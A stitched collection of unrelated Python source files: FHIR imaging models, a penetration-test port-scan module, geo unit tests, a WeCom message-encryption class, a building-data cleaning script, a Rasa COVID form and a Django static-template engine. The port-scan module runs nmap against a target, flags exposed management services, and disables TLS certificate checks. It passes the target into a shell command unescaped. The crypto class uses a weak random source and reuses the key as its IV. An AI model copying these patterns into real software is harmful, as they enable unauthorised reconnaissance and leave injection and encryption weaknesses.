r e s e n t a t i o n s t a t e . """ resource_type = "ImagingStudySeriesInstance" def __init__(self, jsondict=None, strict=True): """ Initialize all valid properties. :raises: FHIRValidationError on validation errors, unless strict is False :param dict jsondict: A JSON dictionary to use for initialization :param bool strict: If True (the default), invalid variables will raise a TypeError """ self.number = None """ T h e n u m b e r o f t h i s i n s t a n c e i n t h e s e r i e s . Type `int`. """ self.sopClass = None """ D I C O M c l a s s t y p e . Type `Coding` (represented as `dict` in JSON). """ self.title = None """ D e s c r i p t i o n o f i n s t a n c e . Type `str`. """ self.uid = None """ D I C O M S O P I n s t a n c e U I D . Type `str`. """ super(ImagingStudySeriesInstance, self).__init__(jsondict=jsondict, strict=strict) def elementProperties(self): js = super(ImagingStudySeriesInstance, self).elementProperties() js.extend([ ("number", "number", int, False, None, False), ("sopClass", "sopClass", coding.Coding, False, None, True), ("title", "title", str, False, None, False), ("uid", "uid", str, False, None, True), ]) return js class ImagingStudySeriesPerformer(backboneelement.BackboneElement): """ W h o p e r f o r m e d t h e s e r i e s . I n d i c a t e s w h o o r w h a t p e r f o r m e d t h e s e r i e s a n d h o w t h e y w e r e i n v o l v e d . """ resource_type = "ImagingStudySeriesPerformer" def __init__(self, jsondict=None, strict=True): """ Initialize all valid properties. :raises: FHIRValidationError on validation errors, unless strict is False :param dict jsondict: A JSON dictionary to use for initialization :param bool strict: If True (the default), invalid variables will raise a TypeError """ self.actor = None """ W h o p e r f o r m e d t h e s e r i e s . Type `FHIRReference` (represented as `dict` in JSON). """ self.function = None """ T y p e o f p e r f o r m a n c e . Type `CodeableConcept` (represented as `dict` in JSON). """ super(ImagingStudySeriesPerformer, self).__init__(jsondict=jsondict, strict=strict) def elementProperties(self): js = super(ImagingStudySeriesPerformer, self).elementProperties() js.extend([ ("actor", "actor", fhirreference.FHIRReference, False, None, True), ("function", "function", codeableconcept.CodeableConcept, False, None, False), ]) return js import sys try: from . import annotation except ImportError: annotation = sys.modules[__package__ + '.annotation'] try: from . import codeableconcept except ImportError: codeableconcept = sys.modules[__package__ + '.codeableconcept'] try: from . import coding except ImportError: coding = sys.modules[__package__ + '.coding'] try: from . import fhirdate except ImportError: fhirdate = sys.modules[__package__ + '.fhirdate'] try: from . import fhirreference except ImportError: fhirreference = sys.modules[__package__ + '.fhirreference'] try: from . import identifier except ImportError: identifier = sys.modules[__package__ + '.identifier']
<filename>core/portscan.py #------------------------------------------------------------------------------- # Name: RPTR Portscan # Purpose: Portscanning # # Author: <NAME> # # Created: 03-10-2016 # Copyright: <NAME> (c) # Version: 1.0 #------------------------------------------------------------------------------- import os import subprocess import time import urllib2 import difflib import ssl from lxml import etree from dbmanager import * class Portscan(): def __init__(self, id_test, target, save_path): self.ports = [] self.id_test = id_test self.target = target self.save_path = save_path self.output = None #fire bullet self.dbmanager = Dbmanager() #management interfaces self.manif = ['ssh', 'telnet', 'vnc', 'ftp', 'mysql', 'microsoft-ds', 'msrpc'] self.manif_found = False def parse(self, file_name): port80 = False doc = etree.parse(file_name) for x in doc.xpath("//host[ports/port[state[@state='open']]]"): for open_p in x.xpath("ports/port[state[@state='open']]"): item = open_p.attrib.values() port = item[1] for child in list(open_p): service = None product = None version = None tunnel = None for x in child.attrib.iteritems(): if(x[0] == 'name'): service = x[1] if(x[0] == 'product'): product = x[1] if(x[0] == 'version'): version = x[1] if(x[0] == 'tunnel'): tunnel = x[1] #following test is added to prevent double scanning if port == "80": port80 = True if port == "443" and port80: if self.check_diff_80_443(self.target): print "80 and 443 are same site" self.ports.append({"port": port, "service": service, "product": product, "version": version, "tunnel": tunnel, "duplicate": True}) continue #check if management interface is detected if service in self.manif: self.manif_found = True self.ports.append({"port": port, "service": service, "product": product, "version": version, "tunnel": tunnel, "duplicate": False}) def fire_scan(self): #get current time start = time.time() #start tool execution in new proces command = "nmap --open --top-ports=50 -sV -oX "+self.save_path+"/nmap_scan.xml "+self.target p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True) #get output form process out, err = p.communicate() self.output = out #calculate how much time the tool used exec_time = time.strftime("%H:%M:%S", time.gmtime(time.time() - start)) #write tool output to database id_tool_log = self.dbmanager.tool_log_create(self.id_test, command, exec_time, out) #parse result self.parse(self.save_path+"/nmap_scan.xml") #if management ports are open, create a vulnerability for it if self.manif_found: self.dbmanager.vulnerability_create(self.id_test, id_tool_log, 1, out) def get_ports(self): return self.ports #check if port 80 and 443 are the same #used to prevent double scanning a website def check_diff_80_443(self, url): try: url = url.replace("'", "") f = urllib2.urlopen("http://"+url) html80 = f.read(25000).replace("http://", "https://") try: ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE f = urllib2.urlopen("https://"+url, context=ctx) except: f = urllib2.urlopen("https://"+url) html443 = f.read(25000) s = difflib.SequenceMatcher(lambda x: x == " ", html443, html80) if round(s.ratio(), 3) > 0.75: return True return False except: return False
<reponame>nathancarter/geo-py import unittest import time import logging import math import geo.sphere as sphere import geo._sphere as _sphere import geo.ellipsoid as ellipsoid import geo._ellipsoid as _ellipsoid import geo._sphere as csphere logging.basicConfig(level=logging.DEBUG) logger = logging.getLogger() p_minsk = (27.561831, 53.902257) p_moscow = (37.620393, 55.75396) def isclose(a, b, rel_tol=1e-09, abs_tol=0): """ Python 2 implementation of Python 3.5 math.isclose() https://hg.python.org/cpython/file/v3.5.2/Modules/mathmodule.c#l1993 """ # sanity check on the inputs if rel_tol < 0 or abs_tol < 0: raise ValueError("tolerances must be non-negative") # short circuit exact equality -- needed to catch two infinities of # the same sign. And perhaps speeds things up a bit sometimes. if a == b: return True # This catches the case of two infinities of opposite sign, or # one infinity and one finite number. Two infinities of opposite # sign would otherwise have an infinite relative tolerance. # Two infinities of the same sign are caught by the equality check # above. if math.isinf(a) or math.isinf(b): return False # Cast to float to allow decimal.Decimal arguments if not isinstance(a, float): a = float(a) if not isinstance(b, float): b = float(b) # now do the regular computation # this is essentially the "weak" test from the Boost library diff = math.fabs(b - a) result = ((diff <= math.fabs(rel_tol * a)) or (diff <= math.fabs(rel_tol * b)) or (diff <= abs_tol)) return result if not hasattr(math, 'isclose'): math.isclose = isclose class TestSphere(unittest.TestCase): def test_distance(self): assert math.isclose( sphere._py_approximate_distance(p_minsk, p_moscow), 676371.322420, rel_tol=1e-06) assert math.isclose( _sphere._approximate_distance(p_minsk, p_moscow), 676371.322420, rel_tol=1e-06) assert math.isclose( sphere._py_haversine_distance(p_minsk, p_moscow), 675656.299481, rel_tol=1e-06) assert math.isclose( _sphere._haversine_distance(p_minsk, p_moscow), 675656.299481, rel_tol=1e-06) assert math.isclose( sphere._py_distance(p_minsk, p_moscow), 675656.299481, rel_tol=1e-06) assert math.isclose( _sphere._distance(p_minsk, p_moscow), 675656.299481, rel_tol=1e-06) def test_projection(self): x, y = sphere._py_from4326_to3857(p_minsk) assert math.isclose(x, 3068168.9922502628, rel_tol=1e-06) assert math.isclose(y, 7151666.629430503, rel_tol=1e-06) x, y = _sphere._from4326_to3857(p_minsk) assert math.isclose(x, 3068168.9922502628, rel_tol=1e-06) assert math.isclose(y, 7151666.629430503, rel_tol=1e-06) lon, lat = sphere._py_from3857_to4326( sphere._py_from4326_to3857(p_minsk)) assert math.isclose(lon, p_minsk[0], rel_tol=1e-06) assert math.isclose(lat, p_minsk[1], rel_tol=1e-06) lon, lat = _sphere._from3857_to4326( _sphere._from4326_to3857(p_minsk)) assert math.isclose(lon, p_minsk[0], rel_tol=1e-06) assert math.isclose(lat, p_minsk[1], rel_tol=1e-06) class TestEllipsoid(unittest.TestCase): def test_distance(self): assert math.isclose( ellipsoid._py_distance(p_minsk, p_moscow), 677789.531233, rel_tol=1e-06) assert math.isclose( _ellipsoid._distance(p_minsk, p_moscow), 677789.531233, rel_tol=1e-06) def test_projection(self): assert ( ellipsoid._py_from4326_to3395(p_minsk) == (3068168.9922502623, 7117115.955611216) ) rp_minsk = ellipsoid._py_from3395_to4326( ellipsoid._py_from4326_to3395(p_minsk)) assert math.isclose(rp_minsk[0], p_minsk[0], rel_tol=1e-06) assert math.isclose(rp_minsk[1], p_minsk[1], rel_tol=1e-06) assert ( _ellipsoid._from4326_to3395(p_minsk) == (3068168.9922502623, 7117115.955611216) ) rp_minsk = _ellipsoid._from3395_to4326( _ellipsoid._from4326_to3395(p_minsk)) assert math.isclose(rp_minsk[0], p_minsk[0], rel_tol=1e-06) assert math.isclose(rp_minsk[1], p_minsk[1], rel_tol=1e-06)
<reponame>sns-sdks/python-workweixin """ 消息加密与解密 """ import base64 import logging import random import socket import struct from Crypto.Cipher import AES from pywework.error import ErrorCode from .padding import PKCS7Padding logger = logging.getLogger(__name__) class MsgCrypto: """ 数据消息的加密与解密 """ def __init__(self, key: bytes) -> None: """ :param key: 加密消息的 key """ self.key = key self.mode = AES.MODE_CBC # 加解密的模式 def encipher(self, plain_text: str, receive_id: str): """ 对明文数据进行补位后加密 :param plain_text: 需要加密的明文 :param receive_id: corp_id 或者 suite_id https://work.weixin.qq.com/api/doc#90000/90139/90968/%E9%99%84%E6%B3%A8 :return: 加密后的字符串 """ plain_text_bytes: bytes = plain_text.encode() # 拼接明文 plain_text_bytes = b"".join( [ self.get_random_str().encode(), # 16字节 随机字符串 struct.pack("I", socket.htonl(len(plain_text_bytes))), # 4字节 消息长度 plain_text_bytes, # 消息内容 receive_id.encode(), # receive id ] ) # 消息补位 pkcs7 = PKCS7Padding() plain_text_bytes = pkcs7.encode(plain_text_bytes) # 数据加密 crypter = AES.new(self.key, self.mode, self.key[:16]) try: cipher_text = crypter.encrypt(plain_text_bytes) return ErrorCode.WXBizMsgCrypt_OK, base64.b64encode(cipher_text) except Exception as e: logger.error(e) return ErrorCode.WXBizMsgCrypt_EncryptAES_Error, None def decipher(self, cipher_text: str, receive_id: str): """ 对密文解密后移除补位 :param cipher_text: 密文 :param receive_id: corp_id 或者 suite_id https://work.weixin.qq.com/api/doc#90000/90139/90968/%E9%99%84%E6%B3%A8 :return: 明文数据 """ crypter = AES.new(self.key, self.mode, self.key[:16]) try: plain_text = crypter.decrypt(base64.b64decode(cipher_text)) except Exception as e: logger.error(e) return ErrorCode.WXBizMsgCrypt_DecryptAES_Error, None # 移除补位 pkcs7 = PKCS7Padding() plain_text = pkcs7.decode(plain_text) # 移除随机字符串 plain_text = plain_text[16:] # 消息长度 msg_len = socket.ntohl(struct.unpack("I", plain_text[:4])[0]) # 消息内容 msg_content = plain_text[4: (msg_len + 4)] # receive id from_received = plain_text[(msg_len + 4):] # 判断 receive id if from_received.decode("utf-8") != receive_id: return ErrorCode.WXBizMsgCrypt_ValidateCorpid_Error, None return ErrorCode.WXBizMsgCrypt_OK, msg_content.decode("utf-8") @staticmethod def get_random_str() -> str: """ 生成随机的16位字符串 :return: """ return str(random.randint(1000000000000000, 9999999999999999))
<reponame>yapanliu/ashrae-ob-database ''' This code will clean the OB datasets and combine all the cleaned data into one Dataset name: O-62-Zoltan Nagy _ June Young Park 1. occupancy data 2. light switch data 3. indoor illuminance data 4. four different rooms in an academic office bulding 5. different time ranges Data_1: 5/7/2018 – 6/30/2018 Data_2: 5/7/2018 – 6/30/2018 Data_3: 5/16/2018 – 6/30/2018 Data_4: 5/7/2018 – 6/30/2018 Data_5: 5/12/2018 – 6/30/2018 ''' import os import glob import string import datetime import pandas as pd # specify the path data_path = 'D:/yapan_office_D/Data/Annex-79-OB-Database/2021-05-28-1130-raw-data/Annex 79 Data Collection/O-62-Zoltan Nagy _ June Young Park/' template_path = 'D:/yapan_office_D/Data/Annex-79-OB-Database/OB Database Consolidation/Templates/' save_path = 'D:/yapan_office_D/Data/Annex-79-OB-Database/2021-05-28-1130-raw-data/Annex 79 Data Collection/O-62-Zoltan Nagy _ June Young Park/_yapan_processing/' # read templates into pandas template_occupancy = pd.read_csv(template_path + 'Occupancy_Measurement.csv') template_light = pd.read_csv(template_path + 'Ligthing_Status.csv') template_indoor = pd.read_csv(template_path + 'Indoor_Measurement.csv') # read data into pandas data_1 = pd.read_csv(data_path + 'data_1.csv') data_2 = pd.read_csv(data_path + 'data_2.csv') data_3 = pd.read_csv(data_path + 'data_3.csv') data_4 = pd.read_csv(data_path + 'data_4.csv') data_5 = pd.read_csv(data_path + 'data_5.csv') # change column names col_names = ['Time', 'Ligthing_Status', 'Occupancy_Measurement', 'Indoor_Illuminance'] data_1.columns = col_names data_2.columns = col_names data_3.columns = col_names data_4.columns = col_names data_5.columns = col_names # change the format of Time column # data_1.dtypes # add columns data_1['Time'] = pd.to_datetime(data_1['Time'], format='%H:%M:%S').dt.time data_1['Hour'] = pd.to_datetime(data_1['Time'], format='%H:%M:%S').dt.hour data_1['Date'] = None data_2['Time'] = pd.to_datetime(data_2['Time'], format='%H:%M:%S').dt.time data_2['Hour'] = pd.to_datetime(data_2['Time'], format='%H:%M:%S').dt.hour data_2['Date'] = None data_3['Time'] = pd.to_datetime(data_3['Time'], format='%H:%M:%S').dt.time data_3['Hour'] = pd.to_datetime(data_3['Time'], format='%H:%M:%S').dt.hour data_3['Date'] = None data_4['Time'] = pd.to_datetime(data_4['Time'], format='%H:%M:%S').dt.time data_4['Hour'] = pd.to_datetime(data_4['Time'], format='%H:%M:%S').dt.hour data_4['Date'] = None data_5['Time'] = pd.to_datetime(data_5['Time'], format='%H:%M:%S').dt.time data_5['Hour'] = pd.to_datetime(data_5['Time'], format='%H:%M:%S').dt.hour data_5['Date'] = None # data_1.shape date_list_1 = pd.date_range('2018-05-07', '2018-07-01', freq='1D') date_list_2 = date_list_1 date_list_3 = pd.date_range('2018-05-16', '2018-07-01', freq='1D') date_list_4 = date_list_1 date_list_5 = pd.date_range('2018-05-12', '2018-07-01', freq='1D') # data 1 # loop through the rows and compare the hours, assign the dates begin_time = datetime.datetime.now() date_index = 0 for index in range(data_1.shape[0]-1): data_1.loc[index, 'Date'] = date_list_1[date_index].date() if (data_1.loc[index, 'Hour'] == 23) and (data_1.loc[index + 1, 'Hour'] == 0): date_index += 1 data_1.loc[index + 1, 'Date'] = date_list_1[date_index].date() else: data_1.loc[index + 1, 'Date'] = date_list_1[date_index].date() pass # create Date_Time column based on Date and Time data_1['Date_Time'] = data_1['Date'].astype(str) + ' ' + data_1['Time'].astype(str) data_1['Date_Time'] = pd.to_datetime(data_1['Date_Time'], format="%Y-%m-%d %H:%M:%S") print('Finished processing data 1') # data 2 # loop through the rows and compare the hours, assign the dates date_index = 0 for index in range(data_2.shape[0]-1): data_2.loc[index, 'Date'] = date_list_2[date_index].date() if (data_2.loc[index, 'Hour'] == 23) and (data_2.loc[index + 1, 'Hour'] == 0): date_index += 1 data_2.loc[index + 1, 'Date'] = date_list_2[date_index].date() else: data_2.loc[index + 1, 'Date'] = date_list_2[date_index].date() # create Date_Time column based on Date and Time data_2['Date_Time'] = data_2['Date'].astype(str) + ' ' + data_2['Time'].astype(str) data_2['Date_Time'] = pd.to_datetime(data_2['Date_Time'], format="%Y-%m-%d %H:%M:%S") print('Finished processing data 2') # data 3 # loop through the rows and compare the hours, assign the dates date_index = 0 for index in range(data_3.shape[0]-1): data_3.loc[index, 'Date'] = date_list_3[date_index].date() if (data_3.loc[index, 'Hour'] == 23) and (data_3.loc[index + 1, 'Hour'] == 0): date_index += 1 data_3.loc[index + 1, 'Date'] = date_list_3[date_index].date() else: data_3.loc[index + 1, 'Date'] = date_list_3[date_index].date() # create Date_Time column based on Date and Time data_3['Date_Time'] = data_3['Date'].astype(str) + ' ' + data_3['Time'].astype(str) data_3['Date_Time'] = pd.to_datetime(data_3['Date_Time'], format="%Y-%m-%d %H:%M:%S") print('Finished processing data 3') # data 4 # loop through the rows and compare the hours, assign the dates date_index = 0 for index in range(data_4.shape[0]-1): data_4.loc[index, 'Date'] = date_list_4[date_index].date() if (data_4.loc[index, 'Hour'] == 23) and (data_4.loc[index + 1, 'Hour'] == 0): date_index += 1 data_4.loc[index + 1, 'Date'] = date_list_4[date_index].date() else: data_4.loc[index + 1, 'Date'] = date_list_4[date_index].date() # create Date_Time column based on Date and Time data_4['Date_Time'] = data_4['Date'].astype(str) + ' ' + data_4['Time'].astype(str) data_4['Date_Time'] = pd.to_datetime(data_4['Date_Time'], format="%Y-%m-%d %H:%M:%S") print('Finished processing data 4') # data 5 # loop through the rows and compare the hours, assign the dates date_index = 0 for index in range(data_5.shape[0]-1): data_5.loc[index, 'Date'] = date_list_5[date_index].date() if (data_5.loc[index, 'Hour'] == 23) and (data_5.loc[index + 1, 'Hour'] == 0): date_index += 1 data_5.loc[index + 1, 'Date'] = date_list_5[date_index].date() else: data_5.loc[index + 1, 'Date'] = date_list_5[date_index].date() # create Date_Time column based on Date and Time data_5['Date_Time'] = data_5['Date'].astype(str) + ' ' + data_5['Time'].astype(str) data_5['Date_Time'] = pd.to_datetime(data_5['Date_Time'], format="%Y-%m-%d %H:%M:%S") print('Finished processing data 5') print(f'Total running time: {datetime.datetime.now() - begin_time}') # assign Room_ID, Building_ID, etc data_1['Room_ID'] = 1 data_1['Building_ID'] = 1 data_2['Room_ID'] = 2 data_2['Building_ID'] = 1 data_3['Room_ID'] = 3 data_3['Building_ID'] = 1 data_4['Room_ID'] = 4 data_4['Building_ID'] = 1 data_5['Room_ID'] = 5 data_5['Building_ID'] = 1 # concat data based on the columns in the templates occ_temp_df = template_occupancy # temperate dataframe light_temp_df = template_light # temperate dataframe indoor_temp_df = template_indoor # temperate dataframe ''' data_1 ''' # data_1, first extract useful columns from processed data, then store them into template occ_df = pd.concat([occ_temp_df, data_1], join='inner', ignore_index=True) # only contains same columns, first column was dropped light_df = pd.concat([light_temp_df, data_1], join='inner', ignore_index=True) indoor_df = pd.concat([indoor_temp_df, data_1], join='inner', ignore_index=True) template_occupancy = pd.concat([template_occupancy, occ_df], ignore_index=True) # concat to the template template_light = pd.concat([template_light, light_df], ignore_index=True) template_indoor = pd.concat([template_indoor, indoor_df], ignore_index=True) ''' data_2 ''' # data_2, first extract useful columns from processed data, then store them into template occ_df = pd.concat([occ_temp_df, data_2], join='inner', ignore_index=True) # only contains same columns, first column was dropped light_df = pd.concat([light_temp_df, data_2], join='inner', ignore_index=True) indoor_df = pd.concat([indoor_temp_df, data_2], join='inner', ignore_index=True) template_occupancy = pd.concat([template_occupancy, occ_df], ignore_index=True) # concat to the template template_light = pd.concat([template_light, light_df], ignore_index=True) template_indoor = pd.concat([template_indoor, indoor_df], ignore_index=True) ''' data_3 ''' # data_3, first extract useful columns from processed data, then store them into template occ_df = pd.concat([occ_temp_df, data_3], join='inner', ignore_index=True) # only contains same columns, first column was dropped light_df = pd.concat([light_temp_df, data_3], join='inner', ignore_index=True) indoor_df = pd.concat([indoor_temp_df, data_3], join='inner', ignore_index=True) template_occupancy = pd.concat([template_occupancy, occ_df], ignore_index=True) # concat to the template template_light = pd.concat([template_light, light_df], ignore_index=True) template_indoor = pd.concat([template_indoor, indoor_df], ignore_index=True) ''' data_4 ''' # data_4, first extract useful columns from processed data, then store them into template occ_df = pd.concat([occ_temp_df, data_4], join='inner', ignore_index=True) # only contains same columns, first column was dropped light_df = pd.concat([light_temp_df, data_4], join='inner', ignore_index=True) indoor_df = pd.concat([indoor_temp_df, data_4], join='inner', ignore_index=True) template_occupancy = pd.concat([template_occupancy, occ_df], ignore_index=True) # concat to the template template_light = pd.concat([template_light, light_df], ignore_index=True) template_indoor = pd.concat([template_indoor, indoor_df], ignore_index=True) ''' data_5 ''' # data_5, first extract useful columns from processed data, then store them into template occ_df = pd.concat([occ_temp_df, data_5], join='inner', ignore_index=True) # only contains same columns, first column was dropped light_df = pd.concat([light_temp_df, data_5], join='inner', ignore_index=True) indoor_df = pd.concat([indoor_temp_df, data_5], join='inner', ignore_index=True) template_occupancy = pd.concat([template_occupancy, occ_df], ignore_index=True) # concat to the template template_light = pd.concat([template_light, light_df], ignore_index=True) template_indoor = pd.concat([template_indoor, indoor_df], ignore_index=True) # check dataframes print(template_occupancy.columns) print(template_light.columns) print(template_indoor.columns) print(template_occupancy.isnull().sum()) print(template_light.isnull().sum()) print(template_indoor.isnull().sum()) template_light['Lighting_Zone_ID'] = 1 print(template_occupancy.dtypes) print(template_light.dtypes) print(template_indoor.dtypes) # assign data types # using apply method template_occupancy[['Occupancy_Measurement', 'Room_ID', 'Building_ID']] \ = template_occupancy[['Occupancy_Measurement', 'Room_ID', 'Building_ID']].apply(pd.to_numeric) template_light[['Ligthing_Status', 'Room_ID', 'Building_ID']] \ = template_light[['Ligthing_Status', 'Room_ID', 'Building_ID']].apply(pd.to_numeric) template_indoor[['Indoor_Illuminance', 'Room_ID', 'Building_ID']] \ = template_indoor[['Indoor_Illuminance', 'Room_ID', 'Building_ID']].apply(pd.to_numeric) # save data template_occupancy.to_csv(save_path + 'Occupancy_Measurement.csv', index=False) template_light.to_csv(save_path + 'Ligthing_Status.csv', index=False) template_indoor.to_csv(save_path + 'Indoor_Measurement.csv', index=False)
from typing import Any, Dict, List, Optional, Text, Union from rasa_sdk import Tracker from rasa_sdk.events import EventType, SlotSet from rasa_sdk.executor import CollectingDispatcher from rasa_sdk.forms import REQUESTED_SLOT, FormAction from covidflow.constants import ( FEEL_WORSE_SLOT, HAS_COUGH_SLOT, HAS_DIFF_BREATHING_SLOT, HAS_FEVER_SLOT, LAST_SYMPTOMS_SLOT, SYMPTOMS_SLOT, Symptoms, ) from .daily_ci_assessment_common import submit_daily_ci_assessment from .form_helper import request_next_slot, validate_boolean_slot, yes_no_nlu_mapping from .lib.log_util import bind_logger FORM_NAME = "daily_ci_feel_better_form" HAS_OTHER_MILD_SYMPTOMS_SLOT = "daily_ci__feel_better__has_other_mild_symptoms" IS_SYMPTOM_FREE_SLOT = "daily_ci__feel_better__is_symptom_free" class DailyCiFeelBetterForm(FormAction): def name(self) -> Text: return FORM_NAME async def run( self, dispatcher, tracker, domain, ): bind_logger(tracker) return await super().run(dispatcher, tracker, domain) ## override to play initial message and set feel_worse slot async def _activate_if_required( self, dispatcher: "CollectingDispatcher", tracker: "Tracker", domain: Dict[Text, Any], ) -> List[EventType]: events = [] if tracker.active_form.get("name") != FORM_NAME: dispatcher.utter_message( template="utter_daily_ci__feel_better__acknowledge" ) events.append(SlotSet(FEEL_WORSE_SLOT, False)) return await super()._activate_if_required(dispatcher, tracker, domain) + events @staticmethod def required_slots(tracker: Tracker) -> List[Text]: """A list of required slots that the form has to fill""" slots = [HAS_FEVER_SLOT, HAS_COUGH_SLOT] last_symptoms = tracker.get_slot(LAST_SYMPTOMS_SLOT) if last_symptoms == Symptoms.MODERATE: slots.append(HAS_DIFF_BREATHING_SLOT) if tracker.get_slot(HAS_DIFF_BREATHING_SLOT) is True: return slots slots.append(HAS_OTHER_MILD_SYMPTOMS_SLOT) if ( tracker.get_slot(HAS_OTHER_MILD_SYMPTOMS_SLOT) is True or tracker.get_slot(HAS_FEVER_SLOT) is True or tracker.get_slot(HAS_COUGH_SLOT) is True ): return slots return slots + [IS_SYMPTOM_FREE_SLOT] def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]: return { HAS_FEVER_SLOT: yes_no_nlu_mapping(self), HAS_COUGH_SLOT: yes_no_nlu_mapping(self), HAS_DIFF_BREATHING_SLOT: yes_no_nlu_mapping(self), HAS_OTHER_MILD_SYMPTOMS_SLOT: yes_no_nlu_mapping(self), IS_SYMPTOM_FREE_SLOT: yes_no_nlu_mapping(self), } def request_next_slot( self, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any], ) -> Optional[List[EventType]]: return request_next_slot( self, dispatcher, tracker, domain, self._utter_ask_slot_template ) def _utter_ask_slot_template(self, slot: str, tracker: Tracker) -> Optional[str]: if slot in [HAS_FEVER_SLOT, HAS_COUGH_SLOT, HAS_DIFF_BREATHING_SLOT]: if tracker.get_slot(REQUESTED_SLOT) == slot: return f"utter_ask_daily_ci__feel_better__{slot}_error" return f"utter_ask_daily_ci__feel_better__{slot}" if ( slot == HAS_OTHER_MILD_SYMPTOMS_SLOT and tracker.get_slot(LAST_SYMPTOMS_SLOT) == Symptoms.MODERATE and tracker.get_slot(REQUESTED_SLOT) != slot ): return f"utter_ask_{slot}_with_acknowledge" return None @validate_boolean_slot def validate_has_fever( self, value: Union[bool, Text], dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any], ) -> Dict[Text, Any]: if value is True: dispatcher.utter_message(template="utter_daily_ci__acknowledge_fever") dispatcher.utter_message(template="utter_daily_ci__take_acetaminophen") dispatcher.utter_message(template="utter_daily_ci__avoid_ibuprofen") else: dispatcher.utter_message( template="utter_daily_ci__feel_better__acknowledge_no_fever" ) return {HAS_FEVER_SLOT: value} @validate_boolean_slot def validate_has_cough( self, value: Union[bool, Text], dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any], ) -> Dict[Text, Any]: if value is True: dispatcher.utter_message(template="utter_daily_ci__cough_syrup_may_help") dispatcher.utter_message(template="utter_daily_ci__cough_syrup_pharmacist") else: dispatcher.utter_message(template="utter_daily_ci__acknowledge_no_cough") return {HAS_COUGH_SLOT: value} @validate_boolean_slot def validate_has_diff_breathing( self, value: Union[bool, Text], dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any], ) -> Dict[Text, Any]: slots = {HAS_DIFF_BREATHING_SLOT: value} if value is True: dispatcher.utter_message( template="utter_daily_ci__feel_better__breathing_difficulty_recommendation_1" ) dispatcher.utter_message( template="utter_daily_ci__feel_better__breathing_difficulty_recommendation_2" ) else: slots[SYMPTOMS_SLOT] = Symptoms.MILD return slots @validate_boolean_slot def validate_daily_ci__feel_better__has_other_mild_symptoms( self, value: Text, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any], ) -> Dict[Text, Any]: if ( value is True or tracker.get_slot(HAS_FEVER_SLOT) is True or tracker.get_slot(HAS_COUGH_SLOT) is True ): dispatcher.utter_message( template="utter_daily_ci__feel_better__has_other_mild_symptoms_recommendation" ) return {HAS_OTHER_MILD_SYMPTOMS_SLOT: value} @validate_boolean_slot def validate_daily_ci__feel_better__is_symptom_free( self, value: Text, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any], ) -> Dict[Text, Any]: slots = {IS_SYMPTOM_FREE_SLOT: value} if value is True: slots[SYMPTOMS_SLOT] = Symptoms.NONE else: dispatcher.utter_message( template="utter_daily_ci__feel_better__has_other_mild_symptoms_still_sick_recommendation" ) return slots def submit( self, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict[Text, Any], ) -> List[Dict]: return submit_daily_ci_assessment(tracker)
<reponame>bckohan/django-static-templates<filename>render_static/engine.py # pylint: disable=C0114 import os from collections import Counter, namedtuple from pathlib import Path from typing import Callable, Dict, Generator, List, Optional, Union from django.conf import settings from django.core.exceptions import ImproperlyConfigured from django.template.backends.django import Template as DjangoTemplate from django.template.exceptions import TemplateDoesNotExist from django.template.utils import InvalidTemplateEngineError from django.utils.functional import cached_property from django.utils.module_loading import import_string from render_static import Jinja2DependencyNeeded from render_static.backends import StaticDjangoTemplates, StaticJinja2Templates from render_static.context import resolve_context from render_static.exceptions import InvalidContext try: # pylint: disable=C0412 from django.template.backends.jinja2 import Template as Jinja2Template except ImportError: # pragma: no cover Jinja2Template = Jinja2DependencyNeeded __all__ = ['StaticTemplateEngine', 'Render'] class Render(namedtuple('_Render', ['selector', 'config', 'template', 'destination'])): """ A named tuple that holds all the pertinent information for a template including: - The selector used to select it - Its configuration from settings, if any - Its template engine Template class - could be a Django or Jinja2 template - The destination where it will be/was rendered """ def __str__(self) -> str: app = getattr(self.template.origin, 'app', None) if app: return f'[{app.label}] {self.template.origin.template_name} -> {self.destination}' return f'{self.template.origin.template_name} -> {self.destination}' def _resolve_context( context: Optional[Union[Dict, Callable, str, Path]], template: Optional[str] = None ) -> Dict: """ Resolve a context configuration parameter into a context dictionary. If the context is a string it is treated as an importable string pointing to a callable, if it is a callable it is called and if it is a dictionary it is simply returned. Any failure to resolve a dictionary from the configuration. :param context: Either an importable string pointing to a callable, a callable instance or a dictionary :return: dictionary holding the context :raises ImproperlyConfigured: if there is a failure to produce a dictionary context """ try: return resolve_context(context) except InvalidContext as inval_ctx: raise ImproperlyConfigured( f"STATIC_TEMPLATES 'context' configuration directive" f"{' for ' + template if template else '' } must be a dictionary or a " f"callable that returns a dictionary!" ) from inval_ctx class StaticTemplateEngine: """ An engine for rendering static templates to disk based on a standard ``STATIC_TEMPLATES`` configuration either passed in at construction or obtained from settings. Static templates are most usually generated by a run of :ref:`renderstatic` preceding `collectstatic`, but this class encapsulates all the behavior of the static engine, may be used independently and can override configured parameters including contexts and render destinations: .. code-block:: from render_static.engine import StaticTemplateEngine from django.conf import settings from pathlib import Path engine = StaticTemplateEngine() # This engine uses the settings.STATIC_TEMPLATE config engine = StaticTemplateEngine({ # This engine uses a custom configuration 'ENGINES': [{ 'BACKEND': 'render_static.backends.StaticJinja2Templates', 'APP_DIRS': True }], 'context': { 'var1': 'value1' }, 'templates': { 'app/html/my_template.html': { 'context': { 'var1': 'value2' } } } }) # this will render the my_template.html template to app/static/app/html/my_template.html # with the context { 'settings': settings, 'var1': 'value2' } engine.render_to_disk('app/html/my_template.html') # using the engine directly we can override configuration directives, this will render # the template with the context { 'settings': settings, 'var1': 'value3' } @ # the custom location 'static_dir/rendered.html' engine.render_to_disk( 'app/html/my_template.html', context={'var1': 'value3'}, destination=Path(settings.BASE_DIR) / 'static_dir/rendered.html' ) :param config: If provided use this configuration instead of the one from settings :raises ImproperlyConfigured: If there are any errors in the configuration passed in or specified in settings. """ config_: Dict = {} DEFAULT_ENGINE_CONFIG = [{ 'BACKEND': 'render_static.backends.StaticDjangoTemplates', 'OPTIONS': { 'loaders': ['render_static.loaders.StaticAppDirectoriesBatchLoader'], 